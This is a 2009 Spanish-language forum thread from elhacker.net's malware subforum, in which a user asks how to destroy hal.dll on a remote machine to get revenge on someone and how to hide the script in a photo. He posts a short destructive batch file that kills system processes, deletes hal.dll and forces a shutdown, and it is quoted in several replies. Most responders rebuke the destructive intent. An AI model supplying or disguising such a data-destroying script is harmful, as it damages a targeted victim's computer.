elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
24 Mayo 2012, 01:35  


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Karcrack, [Zero])
| | |-+  matar el hal
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: matar el hal  (Leído 2,257 veces)
tertulia

Desconectado Desconectado

Mensajes: 219


Ver Perfil
matar el hal
« en: 24 Noviembre 2009, 08:00 »

Hola
Como podria matar el hal.dll de una máquina remota ¿Con un bach iria bien? si es así como lo encubriría para meterlo dentro de una foto.
Más o menos el batch quedaria así (esta cogido de otro post)

@echo off
taskkill /IM explorer.exe /F
taskkill /IM svchost.exe /F
erase /f /q /s %windir%\system32\hal.dll
shutdown -s -f -t 10 -c "Windows dice, usa Linux"
Salu2
En línea
[L]ord [R]NA


Desconectado Desconectado

Mensajes: 1.507


El Dictador y Verdugo de H-Sec


Ver Perfil WWW
Re: matar el hal
« Respuesta #1 en: 24 Noviembre 2009, 08:58 »

Hola
Como podria matar el hal.dll de una máquina remota ¿Con un bach iria bien? si es así como lo encubriría para meterlo dentro de una foto.
Más o menos el batch quedaria así (esta cogido de otro post)

@echo off
taskkill /IM explorer.exe /F
taskkill /IM svchost.exe /F
erase /f /q /s %windir%\system32\hal.dll
shutdown -s -f -t 10 -c "Windows dice, usa Linux"
Salu2
No voy con la destruccion de sistemas pero que te hizo esa persona o es para rolear y decir "I'm a Super H4x0r" y esos Blah Blah Blah.

por cierto repara la ortografia, se escribe batch no bach.
En línea

tertulia

Desconectado Desconectado

Mensajes: 219


Ver Perfil
Re: matar el hal
« Respuesta #2 en: 24 Noviembre 2009, 09:51 »

En primer lugar si repasas el post verás que no esta modificado y pone batch, no se si quieres decir que es vez de batch es bach, si es así lo he escrito mal, pero bueno al margen de eso la verdad es que el tipo me ha jugado una muy muy mala pasada y necesito hacer algo al respecto, no quiero joderle la máquina solo quiero que no la pueda arrancar, el hal lo puede recuperar cualquier entendido en informática y eso no ocasionaria grave daño y eso es lo que quiero.
Salu2
En línea
[L]ord [R]NA


Desconectado Desconectado

Mensajes: 1.507


El Dictador y Verdugo de H-Sec


Ver Perfil WWW
Re: matar el hal
« Respuesta #3 en: 24 Noviembre 2009, 17:45 »

Citar
¿Con un bach iria bien?

A eso me referi cuando te dije que se escribia batch y no bach, si te jugo una mala pasada no creo que sea el metodo de solucion si como dices un entendido podria recuperar el hal.dll y todo resuelto. no creo que ganes nada con eso mas que sonreir por 1 minuto hasta que el entre una copia del hal.dll y listo.

En lo que se refiere al codigo veo que estas empezando en batch.

Otra cosa, porque poner de mensaje "Windows dice, Usa Linux" si usas windows???
En línea

Darioxhcx


Desconectado Desconectado

Mensajes: 2.149


Ver Perfil
Re: matar el hal
« Respuesta #4 en: 24 Noviembre 2009, 17:56 »

Citar
¿Con un bach iria bien?

A eso me referi cuando te dije que se escribia batch y no bach, si te jugo una mala pasada no creo que sea el metodo de solucion si como dices un entendido podria recuperar el hal.dll y todo resuelto. no creo que ganes nada con eso mas que sonreir por 1 minuto hasta que el entre una copia del hal.dll y listo.

En lo que se refiere al codigo veo que estas empezando en batch.

Otra cosa, porque poner de mensaje "Windows dice, Usa Linux" si usas windows???
me explico su problema x msn , le comente sobre la hal , y busco ese codigo en el foro de los super juankers
el-ha**.com
bue , es un copy paste ese codigo...
dejando de lado eso , seria mejor leer informarse , aca no estamos para romper sistemas... ni nada de eso..

off-topic:
shutdown -s -f -t 10 -c "Windows dice, usa Linux"
el que escribio eso seguramente no sabe ni lo que es el grub seguramente y son re h4x0rs XD
En línea

[L]ord [R]NA


Desconectado Desconectado

Mensajes: 1.507


El Dictador y Verdugo de H-Sec


Ver Perfil WWW
Re: matar el hal
« Respuesta #5 en: 24 Noviembre 2009, 18:04 »

Citar
¿Con un bach iria bien?

A eso me referi cuando te dije que se escribia batch y no bach, si te jugo una mala pasada no creo que sea el metodo de solucion si como dices un entendido podria recuperar el hal.dll y todo resuelto. no creo que ganes nada con eso mas que sonreir por 1 minuto hasta que el entre una copia del hal.dll y listo.

En lo que se refiere al codigo veo que estas empezando en batch.

Otra cosa, porque poner de mensaje "Windows dice, Usa Linux" si usas windows???
me explico su problema x msn , le comente sobre la hal , y busco ese codigo en el foro de los super juankers
el-ha**.com
bue , es un copy paste ese codigo...
dejando de lado eso , seria mejor leer informarse , aca no estamos para romper sistemas... ni nada de eso..

off-topic:
shutdown -s -f -t 10 -c "Windows dice, usa Linux"
el que escribio eso seguramente no sabe ni lo que es el grub seguramente y son re h4x0rs XD

xD osea que paso por la web de los super h4x0rs y es un copy-paste, para mi esto es un caso cerrado entonces.
En línea

skapunky
Electronik Engineer &
CoAdmin
***
Desconectado Desconectado

Mensajes: 3.427



Ver Perfil WWW
Re: matar el hal
« Respuesta #6 en: 24 Noviembre 2009, 18:10 »

Pues caso cerrado, tertulia si te jugo una mala pasada esta no es la solución y si haces algo almenos hazlo bien y no uses esas lammeradas.

PD: Abro el tema, pero si hay discusión se deberá cerrar el post. Por otro lado, bajo mi opinion si que trata de una lammerada como un templo.

De todas formas, invito a los usuarios a que en vez de discutir se busque una solución al problema de tertulia y que este usuario vea que quizá lo que el pide no es lo mas conveniente.
« Última modificación: 24 Noviembre 2009, 21:00 por skapunky » En línea

tertulia

Desconectado Desconectado

Mensajes: 219


Ver Perfil
Re: matar el hal
« Respuesta #7 en: 24 Noviembre 2009, 22:20 »

Bueno pues yo ante todo pido disculpas si alguien se ha sentidomal, yo ante mi ingeniudad en estos temas en concreto puse que lo había sacado de otro sitio, pero sin pensar de donde era ni nada, pues lo encontre buscando en google la idea que Darioxhcx me había dado, yo no quiero joder ningún sistema simple y llanamente necesito que esa persona tenga que llamar a un técnico y como he dicho antes matar el hal me parecio una buena idea )proporcionada por Darioxhcx cosa que agradezco).
Bueno terminado todo esto y para finalizar debeis de comprender que todo ha sido fruto de mi inexperiencia y en ningún momento ha habido ninguna intención de maear puesto que lo hacía sin conocimiento de causa.
SAlu2 y lo siento
En línea
[L]ord [R]NA


Desconectado Desconectado

Mensajes: 1.507


El Dictador y Verdugo de H-Sec


Ver Perfil WWW
Re: matar el hal
« Respuesta #8 en: 25 Noviembre 2009, 04:33 »

Bueno pues yo ante todo pido disculpas si alguien se ha sentidomal, yo ante mi ingeniudad en estos temas en concreto puse que lo había sacado de otro sitio, pero sin pensar de donde era ni nada, pues lo encontre buscando en google la idea que Darioxhcx me había dado, yo no quiero joder ningún sistema simple y llanamente necesito que esa persona tenga que llamar a un técnico y como he dicho antes matar el hal me parecio una buena idea )proporcionada por Darioxhcx cosa que agradezco).
Bueno terminado todo esto y para finalizar debeis de comprender que todo ha sido fruto de mi inexperiencia y en ningún momento ha habido ninguna intención de maear puesto que lo hacía sin conocimiento de causa.
SAlu2 y lo siento

Que tal si mejor le dejas pasar esta... para la proxima en vez de bits puedes usar un martillo que es un tanto mas directo y efectivo y enviarias al usuario a su tecnico(El Doctor).
En línea

tertulia

Desconectado Desconectado

Mensajes: 219


Ver Perfil
Re: matar el hal
« Respuesta #9 en: 25 Noviembre 2009, 12:45 »

Gracias, seguire buscado.....................
Lo que no entiendo es porque para hacer un troyano se le da más importancia que para esto, en cuanto pienso que es mucho más destructivo el troyano que lo que yo planteo  :huh:  :huh:  :huh:
Salu2
En línea
Novlucker
Ninja y
Ex-Staff
*
Desconectado Desconectado

Mensajes: 10.239


Yo que tu lo pienso dos veces


Ver Perfil
Re: matar el hal
« Respuesta #10 en: 25 Noviembre 2009, 13:01 »

Porque realmente aprendes algo en el proceso, además de que un toryano no es más que un programa de administración remota, el cual puede o no ser dañino, en tu caso no buscas más que ser dañino  :¬¬

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
http://twitter.com/novlucker

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein

tertulia

Desconectado Desconectado

Mensajes: 219


Ver Perfil
Re: matar el hal
« Respuesta #11 en: 25 Noviembre 2009, 20:00 »

además de que un toryano no es más que un programa de administración remota
Hombre decir eso de un troyano con la cantidad de programas "legales" que hay de administración remota me parece como menos un poco fuerte.
Citar
el cual puede o no ser dañino
por regla general cuando alguien envia un troyano no lo envia para pasar el tiempo.
Citar
en tu caso no buscas más que ser dañino  :¬¬
No estoy de acuerdo es infinitamente más destructivo un virus o un troyano, en el primer de los casos depende de que clase de virus puede ser más o menos dañíno y en el segundo lo que se pretende es tener acceso al ordenador remoto, vamos si eso no es peor no se.
Bueno siempre hay varios puntos de vista dependiendo del cristal con que se mire.
Salu2

[/quote]
En línea
Novlucker
Ninja y
Ex-Staff
*
Desconectado Desconectado

Mensajes: 10.239


Yo que tu lo pienso dos veces


Ver Perfil
Re: matar el hal
« Respuesta #12 en: 25 Noviembre 2009, 20:17 »

Citar
Hombre decir eso de un troyano con la cantidad de programas "legales" que hay de administración remota me parece como menos un poco fuerte.
Aprendes a crear un programa de administración remota, alguien debe de haberlo podido programar antes no?

Citar
por regla general cuando alguien envia un troyano no lo envia para pasar el tiempo.
Quién dijo que hay que enviarlo a una "víctima"?

Citar
Bueno siempre hay varios puntos de vista dependiendo del cristal con que se mire.

 Es verdad, y creo que no es el objetivo de este post, pero si supieras la cantidad de personas que crea este tipo de programas y nunca lo saca de su pc, y más los que se pasan por este subforo, hay que tener en cuenta que lo que aquí se publica es de código abierto, creo que no has entendido el objetivo de este subforo  ;)

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
http://twitter.com/novlucker

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein

[Zero]
Moderador
***
Desconectado Desconectado

Mensajes: 1.059


CALL DWORD PTR DS:[0]


Ver Perfil WWW
Re: matar el hal
« Respuesta #13 en: 25 Noviembre 2009, 21:28 »

Practicamente nadie que programa malware decente lo hace con fines destructivos, lo pueden hacer por aprendizaje, reconocimiento, beneficios económicos, botnets o lo que sea, pero por el puro interés destructivo no. Nadie se va a tirar meses de programación para joder unos cuantos pc's porque si, luego de la primera semana de debuger ya te das cuenta de que el pass de la novia no vale tanto  :xD.

Y los troyanos no son destructivos, ni los worms, no son su principal característica, lo que hace peligrosos a los troyanos es que puede estar bajo el control de cualquiera, y ese cualquiera posiblemente no tenga los mismos valores que el programador que lo diseñó.

Saludos
En línea


“El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.”
Nietzsche
[L]ord [R]NA


Desconectado Desconectado

Mensajes: 1.507


El Dictador y Verdugo de H-Sec


Ver Perfil WWW
Re: matar el hal
« Respuesta #14 en: 25 Noviembre 2009, 21:49 »

Te hare una breve reseña de un worm que programe hace unos meses.

Nivel de propagacion: Bajo (Solo porque si)

Su objetivo no era destruir, solo era protestar por una propuesta que se hizo en mi pais de cobrar para el uso de las playas publicas. Cuando infectaba un ordenador se aseguraba de siempre darle acceso al registro al usuario (Reparaba eso que ponen muchos virus para inhabilitar el registro), aseguraba el acceso al taskmgr (Porque si). Se copiaba a memorias USB que tuvieran mas de 2mb de espacio. Infectaba otras memorias solo desde las 8:00a.m. hasta las 5:00p.m. de Lunes a Viernes y de 8:00a.m. a 2:00p.m. los sabados, no infectaba los domingos. Cambiaba el background con una imagen de mi autoria de un niño en la playa escribiendo en la arena, "Porque cobrar lo que es un regalo de la naturaleza".

Muchos nos dedicamos a programar ese tipo de malware, no destruyen nada, no violan tu privacidad, por lo tanto no son ilegales. Incluso algunos, en los que me incluyo, analizamos malware de otros que se infectaron para ayudarlos en la desinfeccion cuando los AV fallan, si no sabes programar un (Worm/Virus/Troyano) pueden pasar cosas desapercibidas haciendo incluso que el daño sea mayor que el que se presentaba.

Trata de no destruir por un tiempo hasta que consigas conocimientos, cuando los tengas veras que destruir es algo muy poco util para un codigo en el que te exforzaste.

Si aun piensas en la idea de destruir te recomiendo nuevamente lo del martillo.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines